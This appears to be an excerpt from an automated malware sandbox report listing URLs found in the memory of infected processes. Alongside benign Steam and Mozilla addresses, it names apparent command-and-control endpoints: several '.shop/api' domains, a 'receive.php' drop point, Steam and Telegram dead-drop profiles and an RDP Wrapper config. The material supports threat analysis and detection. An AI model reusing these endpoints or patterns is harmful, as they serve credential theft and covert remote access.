Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
Source: RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=B0lGn8MokmdT&l=e
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
Source: 76561199780418869[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2452955008.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2452955008.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, CBAKJE.2.dr	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2452955008.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2452955008.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, CBAKJE.2.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: RegAsm.exe, 00000008.00000002.2501224995.0000000000CED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drawzhotdog.shop:443/api:
Source: IDHIEB.2.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: IDHIEB.2.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: IDHIEB.2.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: RegAsm.exe, 00000008.00000002.2501224995.0000000000CED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fragnantbui.shop/
Source: RegAsm.exe, 00000008.00000002.2501224995.0000000000CED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fragnantbui.shop:443/api
Source: RegAsm.exe, 00000008.00000002.2501224995.0000000000CED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ghostreedmnu.shop:443/api
Source: AFHDGDGIID.exe, 0000000C.00000002.2653231961.0000000002E00000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/lontivero/Open.Nat/issuesOAlso
Source: AFHDGDGIID.exe, 0000000C.00000002.2653462111.00000000033C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hansgborn.eu
Source: AFHDGDGIID.exe, 0000000C.00000002.2653462111.0000000002F51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hansgborn.eu/receive.php
Source: AFHDGDGIID.exe, 0000000C.00000002.2653462111.00000000033C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hansgborn.eu/receive.phpd
Source: RegAsm.exe, 00000008.00000002.2501224995.0000000000CD1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	String found in binary or memory: https://help.steampowered.com/en/
Source: CBAKJE.2.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: RegAsm.exe, 00000008.00000002.2501224995.0000000000CD1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: RegAsm.exe, 00000002.00000002.2490924710.0000000025D02000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2530480824.000000003DACD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2486690771.000000001FD91000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr	String found in binary or memory: https://mozilla.org0/
Source: RegAsm.exe, 00000008.00000002.2501224995.0000000000CED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://offensivedzvju.shop:443/api
Source: RDPWInst.exe, 00000013.00000000.2436607215.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, RDPWInst.exe.12.dr	String found in binary or memory: https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.iniU
Source: RegAsm.exe, 00000008.00000002.2501224995.0000000000CCE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: RegAsm.exe, 00000008.00000002.2501224995.0000000000CED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reinforcenh.shop/.itb
Source: RegAsm.exe, 00000008.00000002.2501224995.0000000000CED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reinforcenh.shop/apiO
Source: RegAsm.exe, 00000008.00000002.2501224995.0000000000CCE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: RegAsm.exe, 00000008.00000002.2501224995.0000000000CD1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.tv/
Source: 76561199780418869[1].htm.2.dr	String found in binary or memory: https://steamcommunity.com/
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: RegAsm.exe, 00000008.00000002.2501224995.0000000000CED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/I
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/L
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	String found in binary or memory: https://steamcommunity.com/discussions/
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.2501224995.0000000000D5B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 76561199780418869[1].htm.2.dr	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199780418869
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	String found in binary or memory: https://steamcommunity.com/market/
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: RegAsm.exe, 00000008.00000002.2501224995.0000000000D5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: file.exe, 00000000.00000002.1732259404.0000000003D45000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000002.00000002.2452955008.00000000007CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869
Source: RegAsm.exe, 0000000B.00000002.2823050611.0000000000D01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869.
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/badges
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/inventory/
Source: RegAsm.exe, 0000000B.00000002.2823050611.0000000000D01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869G
Source: file.exe, 00000000.00000002.1732259404.0000000003D45000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0
Source: RegAsm.exe, 0000000B.00000002.2823050611.0000000000D01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/s
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	String found in binary or memory: https://steamcommunity.com/workshop/
Source: RegAsm.exe, 00000008.00000002.2501224995.0000000000CED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900
Source: RegAsm.exe, 00000008.00000002.2501224995.0000000000CAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stogeneratmns.shop/
Source: RegAsm.exe, 00000008.00000002.2501224995.0000000000CED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stogeneratmns.shop/api1
Source: RegAsm.exe, 00000008.00000002.2501224995.0000000000CED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stogeneratmns.shop/c
Source: RegAsm.exe, 00000008.00000002.2501224995.0000000000CED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stogeneratmns.shop:443/api
Source: 76561199780418869[1].htm.2.dr	String found in binary or memory: https://store.steampowered.com/
Source: 76561199780418869[1].htm.2.dr	String found in binary or memory: https://store.steampowered.com/about/
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	String found in binary or memory: https://store.steampowered.com/explore/
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.2501224995.0000000000D5B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	String found in binary or memory: https://store.steampowered.com/legal/
Source: RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	String found in binary or memory: https://store.steampowered.com/mobile
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	String found in binary or memory: https://store.steampowered.com/news/
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privac
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	String found in binary or memory: https://store.steampowered.com/stats/
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: EBFHJE.2.dr	String found in binary or memory: https://support.mozilla.org
Source: EBFHJE.2.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: EBFHJE.2.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
